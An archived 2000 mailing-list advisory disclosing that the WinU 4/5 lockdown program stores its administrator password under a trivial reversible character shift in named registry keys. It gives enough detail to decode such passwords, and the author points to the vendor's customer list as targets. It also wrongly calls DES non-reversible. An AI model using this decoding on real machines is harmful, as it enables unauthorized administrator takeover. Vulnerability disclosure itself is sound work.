OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: WinU 4/5 weak password vulnerability
From: Nu Omega Tau (nu_omega_tauALTAVISTA.COM)
Date: Wed Aug 16 2000 - 13:48:33 CDT


****************************************
* WINU 4/5 weak password vulnerability *
****************************************

WinU 4/5 weak password encryption leads to possible WinU administrator compromise

Introduction
============
As we all know is Windows 9X an OS without any (good/local) security. WinU (http://www.bardon.com) is one of the many programs who in trying to change this and in my opinion did the best job till now. But some things can still be improved, such as the password encryption...

Encryption - Version 4.X-5.0
============================
Up to version 5.0 the following password encryption algorythm is used:
154 - asciicode_of_character = encrypted_asciicode_of_character
in other words, for the letter "A" (ASCII 65) the formula would be
154 - 65 = 89
or
154 - ASCII(A) = ASCII(Y)
So the word WinU (ASCII 87, 105, 110, 85) would encrypt to: C1,E (ASCII 67, 49, 44, 69)
The encrypted string is then reversed (E,1C) to confuse a password cracker.
The encrypted password is then stored in the Windows registry:
HKEY_CLASSES_ROOT\WinU4\Config or HKEY_CLASSES_ROOT\WinU5\Config
The other program settings are also in the key, but the encrypted password is somewhere near the beginning, if it's a word you'll be able to recognise it if you just decrypt the entire string.

Encryption - Version 5.1
========================
Well... Bardon "fixed" it in version 5.1, instead of the
154 - asciicode_of_character = encrypted_asciicode_of_character formula
the following formula is used now:
asciicode_of_character + 101 = encrypted_asciicode_of_character

This only protects from passwords attacks where a canned program (like the infamous WinU4 hacker utilities) is used. The more advanced and/or determined cracker will search for the right algorythm and with the help of a text of the 4-5.0 algorythm he'll be able to crack it within minutes.

Other versions
==============
Versions earlier then 4.0 probably use the 4.X algorythm or a even weaker scheme.
I wasn't able to get version 5.02, it probably uses the 5.1 algorythm because it was released after I released the algorythm in public.

Possible fix
============
Use a non-reverseable encryption algorythm like DES or something or at least a little more complicated formula then + this or - that.

Conclusion
==========
This vurnerability makes WinU very insecure, lot's of computernetworks using WinU can be easy taken over, especially if they've got an easy to recognise password like "oliebollen" or something.
Checkout www.bardon.com for a list of WinU users... wow!...shit :)

_______________________________________________________________________

Free Unlimited Internet Access! Try it now!
http://www.zdnet.com/downloads/altavista/index.html

_______________________________________________________________________